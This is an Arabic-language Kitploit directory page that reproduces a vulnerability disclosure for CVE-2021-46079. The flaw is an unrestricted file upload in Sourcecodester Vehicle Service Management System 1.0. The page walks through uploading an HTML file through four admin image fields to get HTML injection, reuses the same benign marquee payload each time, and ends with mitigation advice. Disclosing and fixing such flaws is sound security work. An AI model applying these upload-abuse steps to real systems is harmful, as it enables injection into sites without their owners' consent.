Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection — CVE-2021-46079 - توجد ثغرة رفع ملفات غير مقيدة في Sourcecodester Vehicle Service Management System 1.0. يمكن للمهاجم عن بُعد رفع ملفات خبيثة مما يؤدي إلى حقن HTML. | Kitploit
أدوات/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection

CVE-2021-46079 - توجد ثغرة رفع ملفات غير مقيدة في Sourcecodester Vehicle Service Management System 1.0. يمكن للمهاجم عن بُعد رفع ملفات خبيثة مما يؤدي إلى حقن HTML.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

CVE-2021-46079

عنوان الاستغلال: نظام إدارة خدمة المركبات - تحميل ملفات متعدد يؤدي إلى حقن HTML

مؤلف الاستغلال: SANU P.L

CVE: CVE-2021-46079

CVSS: 7.2 عالية

المراجع:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46079
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46079

الوصف:

توجد ثغرة تحميل ملفات غير مقيدة في نظام إدارة خدمة المركبات (Sourcecodester Vehicle Service Management System) الإصدار 1.0. يمكن للمهاجم عن بُعد تحميل ملفات ضارة تؤدي إلى حقن HTML.

1. نظام إدارة خدمة المركبات - 'حسابي' (/admin/?page=user)

الاستغلال:

  1. تسجيل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. الانتقال إلى قسم حسابي http://localhost/vehicle_service/admin/?page=user

الحمولة:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. حفظ كود HTML أعلاه على سبيل المثال: Html Injection.html
  2. في قسم حسابي، أدخل جميع التفاصيل المطلوبة وتصفح ملف HTML في حقل الصورة الرمزية (Avatar).
  3. انقر على زر التحديث.
  4. افتح الصورة الرمزية في علامة تبويب جديدة.
  5. يتم تنفيذ حقن HTML.

2. نظام إدارة خدمة المركبات - 'قائمة المستخدمين' (/admin/?page=user/manage_user)

الاستغلال:

  1. تسجيل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. الانتقال إلى قسم قائمة المستخدمين والنقر على زر إنشاء جديد.

الحمولة:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. حفظ كود HTML أعلاه على سبيل المثال: Html Injection.html
  2. في صفحة إنشاء مستخدم جديد، أدخل جميع التفاصيل المطلوبة وتصفح ملف HTML في حقل الصورة الرمزية (Avatar).
  3. انقر على زر حفظ.
  4. افتح الصورة الرمزية في علامة تبويب جديدة.
  5. يتم تنفيذ حقن HTML.

3. نظام إدارة خدمة المركبات - 'الإعدادات - شعار النظام' (/admin/?page=system_info)

الحمولة:

  1. تسجيل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. الانتقال إلى قسم الإعدادات http://localhost/vehicle_service/admin/?page=system_info

الحمولة:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. حفظ كود HTML أعلاه على سبيل المثال: Html Injection.html
  2. في قسم الإعدادات، أدخل جميع التفاصيل المطلوبة وتصفح ملف HTML في حقل شعار النظام (System Logo).
  3. انقر على زر التحديث.
  4. افتح صورة شعار النظام في علامة تبويب جديدة.
  5. يتم تنفيذ حقن HTML.

4. نظام إدارة خدمة المركبات - 'الإعدادات - غلاف الموقع' (/admin/?page=system_info)

الاستغلال:

  1. تسجيل الدخول إلى لوحة الإدارة http://localhost/vehicle_service/admin
  2. الانتقال إلى قسم الإعدادات http://localhost/vehicle_service/admin/?page=system_info

الحمولة:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. حفظ كود HTML أعلاه على سبيل المثال: Html Injection.html
  2. في قسم الإعدادات، أدخل جميع التفاصيل المطلوبة وتصفح ملف HTML في حقل غلاف الموقع (Website Cover).
  3. انقر على زر التحديث.
  4. افتح صورة غلاف الموقع في علامة تبويب جديدة.
  5. يتم تنفيذ حقن HTML.

التأثير:

يمكن للمهاجم تحميل ملف ضار في نقاط نهاية متعددة مما يؤدي إلى حقن HTML.

التخفيف:

يوصى بتنفيذ ما يلي:

  • لا تقبل اسم الملف وامتداده مباشرة دون وجود مرشح قائمة بيضاء.
  • إذا لم تكن هناك حاجة لأحرف Unicode، فمن المستحسن بشدة قبول الأحرف الأبجدية الرقمية فقط ونقطة واحدة فقط كمدخل لاسم الملف والامتداد.
  • حدد حجم الملف إلى قيمة قصوى لمنع هجمات رفض الخدمة.
  • يجب ألا يكون للدليل الذي تم تحميله أي صلاحية "تنفيذ".
  • لا تعتمد فقط على التحقق من جانب العميل.
تنزيل الأداة